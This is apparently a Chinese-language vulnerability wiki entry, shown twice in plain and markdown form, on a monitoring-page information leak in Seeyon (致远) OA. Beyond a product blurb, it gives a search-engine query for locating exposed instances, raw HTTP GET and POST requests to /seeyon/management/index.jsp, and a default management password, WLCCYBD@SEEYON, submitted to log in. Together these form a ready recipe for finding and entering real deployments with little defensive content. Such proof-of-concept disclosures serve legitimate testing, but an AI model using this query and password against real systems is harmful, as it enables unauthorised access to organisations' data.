fofamini-wiki

登录白背景

源码

致远OA 监控页面信息泄露漏洞

一、漏洞简介

致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专业能力，夯实协同运营中台的落地效果；以移动化、AI智能推进前台的应用创新，实现企业轻量化、智能化业务场景，促进企业全过程管理能效，赋予企业协同工作和运营管理的新体验；在协同运营平台全面升级的基础上，V8.0深耕大型企业管理模式、运营机制，进一步强化“协同”在管理中的价值，推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级，帮助企业构筑全程、全域、全端的运营和服务能力，提升人员效率和组织绩效，赋能企业数字化、智能化发展。致远OA 监控页面信息泄露漏洞。

二、影响版本

致远OA

三、资产测绘

hunterapp.name="致远 OA"
特征

四、漏洞复现

GET /seeyon/management/index.jsp HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

POST /seeyon/management/index.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Connection: close
Cookie: JSESSIONID=311DB2CDE2D3B69CA1550589B001B016
Upgrade-Insecure-Requests: 1

password=WLCCYBD%40SEEYON

默认密码：<font style="color:rgb(199, 37, 78);background-color:rgb(249, 242, 244);">WLCCYBD@SEEYON</font>

原文: https://www.yuque.com/xiaokp7/ocvun2/qn195c1awsiggqa6

# 致远OA 监控页面信息泄露漏洞

# 一、漏洞简介
致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专 业能力，夯实协同运营中台的落地效果；以移动化、AI智能推进前台的应用创新，实现企业轻量化、智能化业务场景，促进企业全过程管理能效，赋予企业协同工作和运营管理的新体验；在协同运营平台全面升级的基础上，V8.0深耕大型企业管理模式、运营机制，进一步强化“协同”在管理中的价值，推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级，帮助企业构筑全程、全域、全端的运营和服务能力，提升人员效率和组织绩效，赋能企业数字化、智能化发展。致远OA 监控页面信息泄露漏洞。

# 二、影响版本
+ 致远OA

# 三、资产测绘
+ hunter`app.name="致远 OA"`
+ 特征

![1699722901222-5422df33-7bbc-4465-8d26-879858556787.png](./img/ILGHTifol1g_zOg9/1699722901222-5422df33-7bbc-4465-8d26-879858556787-670637.png)

# 四、漏洞复现
```java
GET /seeyon/management/index.jsp HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
```

![1713888226494-0d2fc8d0-9d5a-48f3-8edf-6a29cc480f3f.png](./img/ILGHTifol1g_zOg9/1713888226494-0d2fc8d0-9d5a-48f3-8edf-6a29cc480f3f-105275.png)

![1713888243539-019528b6-253f-4c8c-a614-565e05d7e789.png](./img/ILGHTifol1g_zOg9/1713888243539-019528b6-253f-4c8c-a614-565e05d7e789-238080.png)

```java
POST /seeyon/management/index.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Connection: close
Cookie: JSESSIONID=311DB2CDE2D3B69CA1550589B001B016
Upgrade-Insecure-Requests: 1

password=WLCCYBD%40SEEYON
```

![1713888355070-bc714d29-5c2c-4d0f-bd6b-6dfc8a3dc63a.png](./img/ILGHTifol1g_zOg9/1713888355070-bc714d29-5c2c-4d0f-bd6b-6dfc8a3dc63a-509823.png)

默认密码：`<font style="color:rgb(199, 37, 78);background-color:rgb(249, 242, 244);">WLCCYBD@SEEYON</font>`

![1713888273330-3f39c6f6-b2ef-432c-9fa7-f4ac11e89791.png](./img/ILGHTifol1g_zOg9/1713888273330-3f39c6f6-b2ef-432c-9fa7-f4ac11e89791-766661.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qn195c1awsiggqa6>